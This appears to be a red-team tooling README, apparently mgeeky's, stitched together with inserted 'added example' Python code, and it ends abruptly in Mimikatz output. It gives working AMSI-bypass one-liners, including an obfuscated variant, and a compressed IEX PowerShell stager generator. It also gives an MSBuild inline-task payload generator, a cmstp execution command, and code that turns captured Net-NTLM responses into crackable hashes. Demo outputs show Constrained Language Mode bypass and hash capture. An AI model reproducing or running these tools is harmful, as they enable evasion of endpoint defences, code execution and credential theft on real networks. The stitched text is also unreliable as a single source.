Red Teaming and Social-Engineering related scripts, tools and CheatSheets
- backdoor-drop.js
  - Internet Explorer JavaScript trojan/backdoor dropper template, to be used during penetration testing assessments. (gist)
- bloodhound
  - A bunch of BloodHound utilities and scripts.
- Bypass-ConstrainedLanguageMode
  - Tries to bypass AppLocker Constrained Language Mode via a custom COM object, as documented by @xpn in https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/ . It does so by registering a custom COM object (an InProcServer32 DLL) that acts as a native .NET CLR4 host. That host then loads a managed assembly into its current AppDomain, and that assembly finally flips the `SessionData.LanguageMode` variable that decides whether Constrained Language Mode is enforced in the current Runspace. More details in the tool directory itself.
```powershell
PS > $ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage
PS > .\Bypass-CLM.ps1
AppLocker Constrined Language Mode Bypass via COM
(implementation of: @xpn's technique, as documented in:)
(https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/)
Re-implemented, enhanced by: Mariusz Banach, mgeeky
-----
[.] Step 0. Planted DLL files in:
C:\Users\danj\AppData\Local\Temp\ClmDisableAssembly.dll
C:\Users\danj\AppData\Local\Temp\ClmDisableDll.dll
[.] Step 1. Creating custom COM object.
[.] Step 2. Invoking it (ClmDisableDll)...
Powershell runspace Thread ID: 8716
[+] Managed mode assembly. Disabling CLM globally.
Current thread ID (managed/unmanaged): 8 / 8716
Passed argument: '(called from native CLR host)'
============
Use below command to disable CLM on Demand (ignore errors):
PS> New-Object -ComObject ClmDisableDll
============
[+] Finished. CLM status: FullLanguage
PS > New-Object -ComObject ClmDisableDll
PS > $ExecutionContext.SessionState.LanguageMode
FullLanguage
```
- C3-Client
  - A lightweight client script for F-Secure's C3 that lets you set an alarm on an incoming Relay, continuously ping your Relays, clear command queues in various channels, and more. Might be useful while working with the framework.
- clickOnceSharpPickTemplate.cs
  - A template for a C# console project implementing the SharpPick technique of loading PowerShell code from within a C# application. The ClickOnce concept is to generate a self-updating Windows application that is specially privileged (ClickOnce).
- cmstp-template.inf
  - The smallest possible INF template for the CMSTP code execution technique, as described by the LOLBAS project. Sample usage:

```
cmstp.exe /ni /s cmstp.inf
```
- cobalt-arsenal
  - A set of my published Cobalt Strike 4.0+ compatible Aggressor scripts, including a couple of handy utilities I have used on various engagements.
- CobaltSplunk
  - Originally devised by Vincent Yiu, heavily reworked by me: a Splunk application that ingests, indexes and exposes several search operators to work with Cobalt Strike logs from within the Splunk interface. Supports the Cobalt Strike 4.3+ log file syntax. Gives a lot of flexibility to work with Teamserver log files, search through them, generate insightful reports, dashboards and pivot tables, and much more.
- code-exec-templates
  - A small collection of template/backbone files for various code-execution techniques (VBScript/JScript embedded in HTA/SCT/XSL/VBS/JS).
- compressedPowershell.py
  - Creates a PowerShell snippet containing a GZIP-compressed, Base64-encoded payload that gets decompressed and executed (IEX) at runtime. (gist) Example:

```powershell
$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('H4sIAMkfcloC/3u/e390cGVxSWquXlBqWk5qcklmfp6eY3Fxam5STmWslZVPfmJKeGZJRkBiUUlmYo5fYm6qhhJUR3hmXkp+ebGeW35RbrGSpkKNgn9pia5faU6ONS9XNDZFer6pxcWJ6alO+RVAs4Mz8ss11D1LFMrzi7KLFdU1rQFOfXYfjwAAAA=='));
IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
```
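As an added example (my own code, not the page's compressedPowershell.py), here is the generator side of that snippet in Python, together with the inverse operation for triaging such a one-liner when it turns up in logs. The template string is assumed to match the README's snippet above; the sample script is constructed.

```python
# Added example, not the page's compressedPowershell.py: build the
# GZIP+Base64 PowerShell stager the README shows, and reverse it.
import base64
import gzip

# Template mirrors the README's snippet: a MemoryStream over the decoded bytes,
# wrapped in a GzipStream, read to end and handed to IEX.
TEMPLATE = (
    "$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('{b64}'));\n"
    "IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, "
    "[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();"
)


def compress_powershell(script: str) -> str:
    """Return the two-line stager embedding gzip(script) as Base64."""
    # mtime=0 keeps the output deterministic; GzipStream ignores the header timestamp.
    packed = gzip.compress(script.encode("utf-8"), compresslevel=9, mtime=0)
    return TEMPLATE.format(b64=base64.b64encode(packed).decode("ascii"))


def extract_payload(snippet: str) -> str:
    """Inverse of compress_powershell: pull the Base64 blob out of a captured
    one-liner and inflate it, e.g. when triaging a cradle seen in PowerShell
    logs or in a phishing lure."""
    marker = "FromBase64String('"
    start = snippet.index(marker) + len(marker)
    end = snippet.index("'", start)
    return gzip.decompress(base64.b64decode(snippet[start:end])).decode("utf-8")


def is_gzip_b64(blob: str) -> bool:
    """Base64 of any gzip stream starts with 'H4sI' (bytes 1f 8b 08): a cheap
    detection pivot for this cradle, and visible in the README's own blob."""
    return blob.startswith("H4sI")


if __name__ == "__main__":
    demo = 'Write-Host "hello from a compressed cradle"'  # constructed sample
    stager = compress_powershell(demo)
    print(stager)
    print("round-trip ok:", extract_payload(stager) == demo)
```

Note that compression buys size, not stealth: the decompressed script is still handed to `IEX` as a string, so AMSI and Script Block Logging see it in the clear at execution time.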
- Count-PrivilegedGroupMembers.ps1
  - Counts the number of members in a predefined (or augmented from an input file) list of privileged, sensitive Active Directory groups. Purely for statistics and overview purposes.
- Create-Lnk.ps1
  - Utterly simple script to create LNK files. Handy when one needs to create some dodgy shortcuts acting as yet another stage in a code execution chain.
- Disable-Amsi.ps1
  - Tries to evade AMSI by leveraging a couple of publicly documented techniques, in an approach that avoids signatured or otherwise flagged keywords. Using a hash-lookup approach when resolving prohibited symbol names, the script avoids relying on blacklisted values hardcoded within it. This implementation iterates over all loaded assemblies, their exposed types, methods and fields, in order to find the ones it needs by their computed hash value rather than by direct name. Since the hash computation algorithm is open-sourced and simple to manipulate, the attacker can customise the hash-lookup scheme however they like.
```powershell
PS > "amsiInitFailed"
At line:1 char:1
+ "amsiInitFailed"
+ ~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent
PS > . .\Disable-Amsi.ps1
PS > Disable-Amsi
[+] Disabled Script Block logging.
[+] Success via technique 1.
PS > "amsiInitFailed"
amsiInitFailed
```
Oh, by the way: you can grab my custom AMSI evasion one-liners below, perfect for one-shot use cases:

- Technique 1A: Overwrite the `AmsiUtils.amsiContext` object's `_HAMSICONTEXT.Signature` byte. Length: 146 bytes.

```powershell
[Runtime.InteropServices.Marshal]::WriteByte((([Ref].Assembly.GetTypes()|?{$_-clike'*Am*ls'}).GetFields(40)|?{$_-clike'*xt'}).GetValue($null),0x5)
```

- Technique 1B: Same as 1A, but an obfuscated variant (256 bytes).

```powershell
$h=[TyPE]('{5}{2}{4}{0}{3}{1}'-f'er','L','Un','viCes.maRShA','TIME.INTErOPS','r');Sv('W'+'e') ([tYpe]('{1}{0}'-f'EF','r'));(gET-vAriABLE h).vAlue::WriteByte((($wE.Assembly.GetTypes()|?{$_-clike'*Am*ls'}).GetFields(40)|?{$_-clike'*xt'}).GetValue($null),0x5)
```

- Disable-ScriptLogging.ps1
  - Tries to evade Script Block Logging by leveraging a couple of publicly documented techniques, in an approach that avoids signatured or otherwise flagged keywords. Warning: this scriptlet should be launched first, before Disable-Amsi.ps1, for a better OpSec experience.
- Download-Cradles-Oneliners.md
  - Various PowerShell download cradles as one-liners. (gist)
- ElusiveMice
  - Cobalt Strike User-Defined Reflective Loader with AV/EDR evasion in mind. Applies AMSI, ETW and WLDP (Windows Lockdown Policy) in-memory patches that thwart some of the optics EDRs monitor.
- Export-ReconData.ps1
  - PowerShell script leveraging the PowerSploit Recon module (PowerView) to save the output of reconnaissance cmdlets such as `Get-*` and `Find-*` into Clixml files. Those files (stored in an output directory as separate XML files) can later be extracted from the attacked environment and loaded into a new PowerShell runspace using the same script. Very useful when we want to collect as much data as possible, exfiltrate it, review it in a safe place and then return to the attacked domain for lateral movement. Warning: be careful, as this script launches many reconnaissance commands one after another, which WILL generate a lot of noise. Microsoft ATA, for instance, will most certainly pick you up with "Reconnaissance using SMB session enumeration" after you have launched `Invoke-UserHunter`. WARNING: this script is compatible with the newer PowerView (from the dev branch as of 2018) that exposes the various `Get-Domain*` and `Find-*` cmdlets. To save recon data from the older PowerView, refer to my `Save-ReconData.ps1` script in this directory. Exposed functions:
    - `Export-ReconData` - launches many cmdlets and exports their Clixml outputs.
    - `Import-ReconData -DirName <DIR>` - loads previously exported Clixml outputs and stores them in global variables that remain reachable after the script terminates.
    - `Get-ReconData -DirName <DIR>` - gets the names of the variables that were created and contain previously imported data.
```powershell
PS E:\PowerSploit\Recon> Load-ReconData -DirName .\PowerView-12-18-2018-08-30-09
Loaded $FileFinderSearchSYSVol results.
Loaded $FileFinder results.
Loaded $ForeignGroup results.
Loaded $ForeignUser results.
Loaded $GPOLocation results.
Loaded $MapDomainTrust results.
Loaded $NetComputer results.
Loaded $NetDomain results.
Loaded $NetDomainController results.
Loaded $NetDomainTrust results.
Loaded $NetFileServer results.
Loaded $NetForest results.
Loaded $NetForestCatalog results.
Loaded $NetForestDomain results.
Loaded $NetForestTrust results.
Loaded $NetGPO results.
Loaded $NetGPOGroup results.
Loaded $NetGroup results.
Loaded $NetGroupMember results.
Loaded $NetLocalGroup results.
Loaded $NetLoggedon results.
Loaded $NetOU results.
Loaded $NetProcess results.
Loaded $NetRDPSession results.
Loaded $NetSession results.
Loaded $NetShare results.
Loaded $NetSite results.
Loaded $NetSubnet results.
Loaded $NetUserAdminCount results.
Loaded $NetUser results.
Loaded $ShareFinder results.
Loaded $StealthUserHunterShowAll results.
Loaded $UserHunterShowAll results.
```
- EvilClippy
  - My fork of Stan Hegt's original, enhanced with support for both Office pre-2007 and Office 2007+ file formats (PowerPoint, Publisher, Excel, Word).
- Find-GPODelegatedUsers.ps1
  - One-liner for finding GPO-delegated users that can edit the settings of a GPO and thus could be used to abuse GPO permissions (https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/). (gist)
- Get-UserPasswordEntries.ps1
  - A simple script for finding and decoding `userPassword` properties stored by some legacy Samba/Linux Kerberos implementations.
- generateMSBuildXML.py
  - PowerShell via MSBuild inline-task XML payload generation script, to be used during red team assignments to launch PowerShell payloads without using `powershell.exe`. (gist)

    This script can embed the following data within the constructed C# task:
    - PowerShell code
    - raw shellcode to be executed in a separate thread via CreateThread
    - a .NET assembly reflectively loaded via Assembly.Load

    Example output, **not minimized**:
```text
C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox.ps1
:: Powershell via MSBuild inline-task XML payload generation script
To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
[?] File not recognized as PE/EXE.
------------------------------------------------------------------------------------
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- Based on Casey Smith work, Twitter: @subTee -->
<!-- Automatically generated using `generateMSBuildXML.py` utility -->
<!-- by Mariusz Banach / mgeeky <mb@binary-offensive.com> -->
<Target Name="btLDoraXcZV">
<hwiJYmWvD />
</Target>
<UsingTask TaskName="hwiJYmWvD" TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Reference Include="System.Management.Automation" />
<Code Type="Class" Language="cs">
<![CDATA[
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
public class hwiJYmWvD : Task {
public override bool Execute() {
byte[] payload = System.Convert.FromBase64String("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");
string decoded = System.Text.Encoding.UTF8.GetString(payload);
Runspace runspace = RunspaceFactory.CreateRunspace();
runspace.Open();
Pipeline pipeline = runspace.CreatePipeline();
pipeline.Commands.AddScript(decoded);
pipeline.Invoke();
runspace.Close();
return true;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>
------------------------------------------------------------------------------------
```

    Example output, **minimized**:

```text
C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox.ps1 -m
:: Powershell via MSBuild inline-task XML payload generation script
To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
[?] File not recognized as PE/EXE.
------------------------------------------------------------------------------------
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003"><Target Name="mYOYInAFWE"><DpaYaokgauWBJbe /></Target><UsingTask TaskName="DpaYaokgauWBJbe" TaskFactory="CodeTaskFactory" AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll"><Task><Reference Include="System.Management.Automation" /><Code Type="Class" Language="cs"><![CDATA[using System.Management.Automation;using System.Management.Automation.Runspaces;using Microsoft.Build.Framework;using Microsoft.Build.Utilities;public class DpaYaokgauWBJbe:Task{public override bool Execute(){byte[] x=System.Convert.FromBase64String("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");string d=System.Text.Encoding.UTF8.GetString(x);Runspace r=RunspaceFactory.CreateRunspace();r.Open();Pipeline p=r.CreatePipeline();p.Commands.AddScript(d);p.Invoke();r.Close();return true;}}]]></Code></Task></UsingTask></Project>
------------------------------------------------------------------------------------
```
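As an added example (my own code, not mgeeky's generateMSBuildXML.py), the following Python reproduces the PowerShell path of that generator: it emits the same CodeTaskFactory project shape shown above with random Target/Task names, offers the `-m` style minimisation, applies the MZ/PE sniff behind the "[?] File not recognized as PE/EXE." message, and can pull the embedded script back out of a generated or captured project file. The shellcode and Assembly.Load variants are deliberately not implemented; the sample script is constructed.

```python
# Added example, not mgeeky's generateMSBuildXML.py: emit the MSBuild inline-task
# project shown above (CodeTaskFactory class hosting a PowerShell runspace),
# sniff for PE input the way the tool reports it, and recover the payload again.
import base64
import random
import string
import struct
import xml.etree.ElementTree as ET

MSBUILD_NS = "http://schemas.microsoft.com/developer/msbuild/2003"
TASKS_DLL = r"C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll"

# C# body, one statement per line so it can be joined with "" when minimizing.
CSHARP = [
    "using System.Management.Automation;",
    "using System.Management.Automation.Runspaces;",
    "using Microsoft.Build.Framework;",
    "using Microsoft.Build.Utilities;",
    "public class {task} : Task {{",
    "  public override bool Execute() {{",
    '    byte[] payload = System.Convert.FromBase64String("{b64}");',
    "    string decoded = System.Text.Encoding.UTF8.GetString(payload);",
    "    Runspace runspace = RunspaceFactory.CreateRunspace();",
    "    runspace.Open();",
    "    Pipeline pipeline = runspace.CreatePipeline();",
    "    pipeline.Commands.AddScript(decoded);",
    "    pipeline.Invoke();",
    "    runspace.Close();",
    "    return true;",
    "  }}",
    "}}",
]

XML = (
    ['<Project xmlns="{ns}">',
     '  <Target Name="{target}">',
     '    <{task} />',
     '  </Target>',
     '  <UsingTask TaskName="{task}" TaskFactory="CodeTaskFactory" AssemblyFile="{dll}">',
     '    <Task>',
     '      <Reference Include="System.Management.Automation" />',
     '      <Code Type="Class" Language="cs">',
     '        <![CDATA[']
    + ["        " + line for line in CSHARP]
    + ['        ]]>',
       '      </Code>',
       '    </Task>',
       '  </UsingTask>',
       '</Project>']
)


def looks_like_pe(data: bytes) -> bool:
    """True when data has an MZ header whose e_lfanew points at a 'PE\\0\\0'
    signature; the tool prints '[?] File not recognized as PE/EXE.' otherwise."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def random_name(rng: random.Random, n: int) -> str:
    # Names double as XML element names and the C# class name: keep them alphabetic.
    return "".join(rng.choice(string.ascii_letters) for _ in range(n))


def generate_msbuild_xml(script: str, minimize: bool = False, seed=None) -> str:
    """Build the project file; a seeded rng gives reproducible element names."""
    rng = random.Random(seed)
    values = {
        "ns": MSBUILD_NS,
        "dll": TASKS_DLL,
        "target": random_name(rng, rng.randint(8, 16)),
        "task": random_name(rng, rng.randint(8, 16)),
        "b64": base64.b64encode(script.encode("utf-8")).decode("ascii"),
    }
    lines = [line.format(**values) for line in XML]
    if minimize:
        # Stripping indentation and joining without newlines keeps the C# valid:
        # every statement already ends with ';' or a brace.
        return "".join(line.strip() for line in lines)
    return "\n".join(lines)


def extract_script(project_xml: str) -> str:
    """Recover the embedded PowerShell from a generated (or captured) project file."""
    marker = 'FromBase64String("'
    start = project_xml.index(marker) + len(marker)
    end = project_xml.index('"', start)
    return base64.b64decode(project_xml[start:end]).decode("utf-8")


def check_project(project_xml: str) -> bool:
    """Parse the output and confirm the Target invokes the UsingTask's TaskName."""
    root = ET.fromstring(project_xml)
    ns = {"m": MSBUILD_NS}
    invoked = root.find("m:Target", ns)[0].tag.split("}")[1]
    return invoked == root.find("m:UsingTask", ns).get("TaskName")


if __name__ == "__main__":
    demo = 'Write-Host "msgbox"'  # constructed sample script
    print(generate_msbuild_xml(demo, minimize=True, seed=1))
```

The `seed` parameter exists for reproducible tests; leave it `None` in practice so every generated file carries fresh names, since the Target/Task identifiers are the only strings in the file that vary between runs.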
- Get-DomainOUTree.ps1
  - Collects the OU entries returned by PowerView's `Get-NetOU` / `Get-DomainOU` cmdlet and prints that structure as a tree of Organizational Units. The scriptlet works with the older PowerView that implements the `Get-NetOU` cmdlet, by piping its output to `Get-NetOUTree`:

```powershell
PS E:\PowerSploit\Recon> Get-NetOU | Get-NetOUTree
```

    and with the newer PowerView that ships the `Get-DomainOU` cmdlet:

```powershell
PS E:\PowerSploit\Recon> Get-DomainOU | Get-DomainOUTree
+ CONTOSO
+ SharedFolders
+ Departments
+ IT
+ SALES
+ LAWYERS
+ CHIEFS
+ AUDIT
+ HR
+ Software
+ Computers
+ Workstations
+ Servers
+ Data
+ Infrastructure
+ SOC
+ Groups
+ Users
+ Partners
+ Employees
+ Admins
+ Domain Controllers
+ Microsoft Exchange Security Groups
```
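As an added example (my own code, not Get-DomainOUTree.ps1), here is the same idea done offline in Python over a list of `distinguishedName` strings, such as the ones you would export from `Get-DomainOU` and carry out of the environment. It parses each DN with RFC 4514 escaping in mind, so an OU whose name contains an escaped comma is not split in two, and renders the nested structure in the `+ name` style above. Labelling the root with the DNS-style domain assembled from the `DC=` components is my choice; the page does not show how the original script derives its root label. The DNs are constructed.

```python
# Added example, not Get-DomainOUTree.ps1: build and print an OU tree offline from
# distinguishedName strings. Root label = DC components joined with "." (my choice).


def split_dn(dn: str) -> list:
    """Split an LDAP DN into RDN strings, honouring backslash escapes (RFC 4514),
    so 'OU=Sales\\, EMEA' stays one component instead of two."""
    rdns, current, escaped = [], [], False
    for ch in dn:
        if escaped:
            current.append(ch)
            escaped = False
        elif ch == "\\":
            escaped = True
        elif ch == ",":
            rdns.append("".join(current).strip())
            current = []
        else:
            current.append(ch)
    rdns.append("".join(current).strip())
    return rdns


def build_ou_tree(dns) -> dict:
    """Nested dict: domain -> OU -> child OU ... A DN lists the leaf first, so the
    OU components are walked in reverse to descend from the domain root."""
    tree = {}
    for dn in dns:
        rdns = split_dn(dn)
        ous = [r[3:] for r in rdns if r[:3].upper() == "OU="]
        dcs = [r[3:] for r in rdns if r[:3].upper() == "DC="]
        node = tree.setdefault(".".join(dcs), {})
        for ou in reversed(ous):
            node = node.setdefault(ou, {})
    return tree


def render_tree(tree: dict, depth: int = 0) -> list:
    """Render with the '+ name' / two-space indentation style shown above."""
    lines = []
    for name, children in tree.items():
        lines.append("  " * depth + "+ " + name)
        lines.extend(render_tree(children, depth + 1))
    return lines


if __name__ == "__main__":
    sample = [  # constructed DNs
        "OU=Departments,DC=contoso,DC=local",
        "OU=IT,OU=Departments,DC=contoso,DC=local",
        "OU=Sales\\, EMEA,OU=Departments,DC=contoso,DC=local",
        "OU=Servers,OU=Computers,DC=contoso,DC=local",
        "OU=Domain Controllers,DC=contoso,DC=local",
    ]
    print("\n".join(render_tree(build_ou_tree(sample))))
```

Because a parent OU is created on first sight, the tree is complete even when the export only contains leaf OUs, which is what you get when the query was filtered.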
- Invoke-Command-Cred-Example.ps1
  - Example of using PSRemoting with credentials passed directly from the command line. (gist)
- msbuild-powershell-msgbox.xml
  - Example of PowerShell execution via an MSBuild inline-task XML file, running a simple message-box script. (gist)
- muti-stage-1.md
  - Multi-stage penetration testing / red teaming malicious Word document creation process. (gist)
- OfficePurge
  - My fork of Mandiant's original OfficePurge, enhanced with support for Office 2007+ and a few other features.
- RedWarden
  - A Cobalt Strike C2 reverse proxy fending off Blue Teams, AVs, EDRs and scanners through packet inspection and malleable profile correlation.
- rogue-dot-net
  - Set of scripts, requirements and instructions for generating .NET assemblies valid for the Regasm/Regsvcs/InstallUtil code execution primitives.
- Save-ReconData.ps1
  - PowerShell script leveraging the PowerSploit Recon module (PowerView) to save the output of reconnaissance cmdlets such as `Get-*` and `Find-*` into Clixml files. It differs from `Export-ReconData.ps1` in that it supports only the older PowerView version from before 12 Dec 2016. Exposed functions:
    - `Save-ReconData` - launches many cmdlets and exports their Clixml outputs.
    - `Load-ReconData -DirName <DIR>` - loads previously exported Clixml outputs and stores them in global variables that remain reachable after the script terminates.
    - `Get-ReconData -DirName <DIR>` - gets the names of the variables that were created and contain previously imported data.
- set-handler.rc
  - Quickly sets up Metasploit's multi/handler plus a (separate) web_delivery handler for use with PowerShell. (gist)
- SharpWebServer
  - Red Team oriented C# simple HTTP server with Net-NTLMv1/v2 hash capture functionality.

```text
C:\> SharpWebServer.exe port=8888 dir=C:\Windows\Temp verbose=true ntlm=true
:: SharpWebServer ::
a Red Team oriented C# Simple HTTP Server with Net-NTLMv1/2 hashes capture functionality
[.] Serving HTTP server on port : 8888
[.] Will run for this long : 60 seconds
[.] Verbose mode turned on.
[.] NTLM mode turned on.
[.] Serving files from directory : C:\Windows\Temp
SharpWebServer [29.03.21, 17:55:14] NTLM: Sending 401 Unauthorized due to lack of Authorization header.
SharpWebServer [29.03.21, 17:55:14] ::1 - "GET /test.txt" - len: 0 (401)
SharpWebServer [29.03.21, 17:55:14] NTLM: Sending 401 Unauthorized with NTLM Challenge Response.
SharpWebServer [29.03.21, 17:55:14] ::1 - "GET /test.txt" - len: 0 (401)
[+] SharpWebServer: Net-NTLM hash captured:
TestUser:::1122334455667788:66303EE2DF9417E2FE07E1B7FD663205:010100000000000092EC04E8B324D701C2B561D5FECBB325000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C00080030003000000000000000010000000020000045E18A336DA58F5F0F826F846C699F77DCCF02BA5135525AC52EFBB0C0A1F1160A0010000000000000000000000000000000000009001C0048005400540050002F006C006F00630061006C0068006F00730074000000000000000000
SharpWebServer [29.03.21, 17:55:14] ::1 - "GET /test.txt" - len: 11 (200)
```
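As an added example (my own code, not SharpWebServer's), here is the step behind the "Net-NTLM hash captured" line: once the client answers the second 401 with an `Authorization: NTLM <base64>` header carrying the type 3 (AUTHENTICATE_MESSAGE), that message is split into its security buffers per MS-NLMP and, together with the 8-byte server challenge we issued in the type 2, turned into the hashcat line shown above. It assumes the client negotiated Unicode strings (the common case) and ignores the optional Version/MIC fields; the type 3 in the demo is constructed, reusing the NTProofStr from the capture above with a short made-up blob.

```python
# Added example, not SharpWebServer's code: decode the NTLM type 3
# (AUTHENTICATE_MESSAGE) a client sends back after our 401 challenge and render
# it as the hashcat Net-NTLMv2 (mode 5600) / Net-NTLMv1 (mode 5500) line.
# Layout per MS-NLMP 2.2.1.3; Version/MIC fields are not needed for cracking.
import base64
import struct

NTLMSSP_NEGOTIATE_UNICODE = 0x00000001
# Server challenge seen in the capture above (also Responder's default static one).
STATIC_CHALLENGE = bytes.fromhex("1122334455667788")


def _buffer(msg: bytes, off: int) -> bytes:
    """Read a (Len, MaxLen, Offset) security-buffer descriptor and return its bytes."""
    length, _maxlen, offset = struct.unpack_from("<HHI", msg, off)
    if offset + length > len(msg):
        raise ValueError("security buffer points past end of message")
    return msg[offset:offset + length]


def parse_type3(msg: bytes) -> dict:
    """Split an AUTHENTICATE_MESSAGE into its named fields."""
    if msg[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", msg, 8)[0] != 3:
        raise ValueError("not an NTLM type 3 message")
    flags = struct.unpack_from("<I", msg, 60)[0]
    enc = "utf-16-le" if flags & NTLMSSP_NEGOTIATE_UNICODE else "cp437"
    return {
        "lm_response": _buffer(msg, 12),
        "nt_response": _buffer(msg, 20),
        "domain": _buffer(msg, 28).decode(enc),
        "user": _buffer(msg, 36).decode(enc),
        "workstation": _buffer(msg, 44).decode(enc),
        "flags": flags,
    }


def hashcat_line(authorization_b64: str, server_challenge: bytes = STATIC_CHALLENGE) -> str:
    """authorization_b64 is the value after 'Authorization: NTLM '. A 24-byte NT
    response is NTLMv1 (user::domain:LM:NT:challenge); anything longer is NTLMv2,
    where the first 16 bytes are NTProofStr and the rest is the client blob
    (user::domain:challenge:NTProofStr:blob), the shape in the capture above."""
    p = parse_type3(base64.b64decode(authorization_b64))
    nt, chal = p["nt_response"], server_challenge.hex().upper()
    if len(nt) == 24:
        return f"{p['user']}::{p['domain']}:{p['lm_response'].hex().upper()}:{nt.hex().upper()}:{chal}"
    return f"{p['user']}::{p['domain']}:{chal}:{nt[:16].hex().upper()}:{nt[16:].hex().upper()}"


def encode_header(msg: bytes) -> str:
    """Base64 as it appears in the Authorization header."""
    return base64.b64encode(msg).decode("ascii")


def build_type3(user: str, domain: str, workstation: str,
                lm_response: bytes, nt_response: bytes) -> bytes:
    """Constructed sample only: a minimal Unicode type 3 with no Version/MIC."""
    parts = [lm_response, nt_response, domain.encode("utf-16-le"),
             user.encode("utf-16-le"), workstation.encode("utf-16-le"), b""]
    descriptors, payload = b"", b""
    base = 8 + 4 + 6 * 8 + 4  # signature, type, six descriptors, flags
    for part in parts:
        descriptors += struct.pack("<HHI", len(part), len(part), base + len(payload))
        payload += part
    return (b"NTLMSSP\x00" + struct.pack("<I", 3) + descriptors
            + struct.pack("<I", NTLMSSP_NEGOTIATE_UNICODE) + payload)


if __name__ == "__main__":
    # NTProofStr from the capture above + a short constructed blob.
    nt = bytes.fromhex("66303EE2DF9417E2FE07E1B7FD663205" + "010100000000000092EC04E8B324D701")
    print(hashcat_line(encode_header(build_type3("TestUser", "", "WS01", b"\x00" * 24, nt))))
```

Feed the v2 line to `hashcat -m 5600` and a v1 line to `-m 5500`. The fixed `1122334455667788` challenge matters only for NTLMv1: with a known server challenge the 24-byte DES-based response can be attacked with precomputed tables. An NTLMv2 response also mixes in the client's own random challenge inside the blob, so each capture still has to be cracked by dictionary or brute force.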
- SharpWMI
  - A refurbished and enhanced version of @harmj0y's original SharpWMI that adds more flexibility for working with malicious VBS scripts, AMSI evasion, file upload purely via WMI, and makes it possible to return output from commands executed remotely over WMI. Initially submitted as Pull Request #3 to the original project; unless it gets merged there, I will keep my fork pinned here for accountability.
- Stracciatella
  - PowerShell runspace from within C# (aka the `SharpPick` technique) with AMSI and Script Block Logging disabled for your pleasure.
    - Provides functionality to decode passed parameters on the fly, using Base64 and single-byte XOR decoding (also combined).
    - Before launching any command, it makes sure to disable AMSI using two approaches.
    - Before launching any command, it makes sure to disable Script Block Logging using two approaches.
    - Does not patch any system library or system native code (think amsi.dll).
    - Efforts were made not to keep decoded scripts/commands around longer than needed, to protect against memory-dumping techniques employed by EDRs and AVs.
    - The resulting binary may be considered a bit too large; that is because the `Costura.Fody` NuGet package is used, which bundles `System.Management.Automation.dll` within the resulting assembly.
```text
PS D:\> Stracciatella.exe -v -b -x 0x31 -c "ZkNYRVQceV5CRRETeEURRl5DWkIRXVhaVBFQEVJZUENcEBMRChEVdElUUkRFWF5fcl5fRVRJRR9iVEJCWF5fYkVQRVQffVBfVkRQVlR8XlVU" .\Test2.ps1
:: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled.
Mariusz Banach / mgeeky, '19 <mb@binary-offensive.com>
[.] Will load script file: '.\Test2.ps1'
[+] AMSI Disabled.
[+] Script Block Logging Disabled.
[.] Language Mode: FullLanguage
PS> & '.\Test2.ps1'
PS> Write-Host "It works like a charm!" ; $ExecutionContext.SessionState.LanguageMode
[+] Yeeey, it really worked.
It works like a charm!
FullLanguage
PS D:\> "amsiInitFailed"
At line:1 char:1
+ "amsiInitFailed"
+ ~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent
PS D:\> . .\Invoke-Mimikatz.ps1
At line:1 char:1
+ . .\Invoke-Mimikatz.ps1
+ ~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent
PS D:\> .\Stracciatella.exe -v
:: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled.
Mariusz Banach / mgeeky, '19 <mb@binary-offensive.com>
[-] It looks like no script path was given.
[+] AMSI Disabled.
[+] Script Block Logging Disabled.
[.] Language Mode: FullLanguage
Stracciatella D:\> . .\Invoke-Mimikatz.ps1
Stracciatella D:\> Invoke-Mimikatz -Command "coffee ; exit"
.#####. mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14
.## ^ ##. "A La Vie, A L'Amour"
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
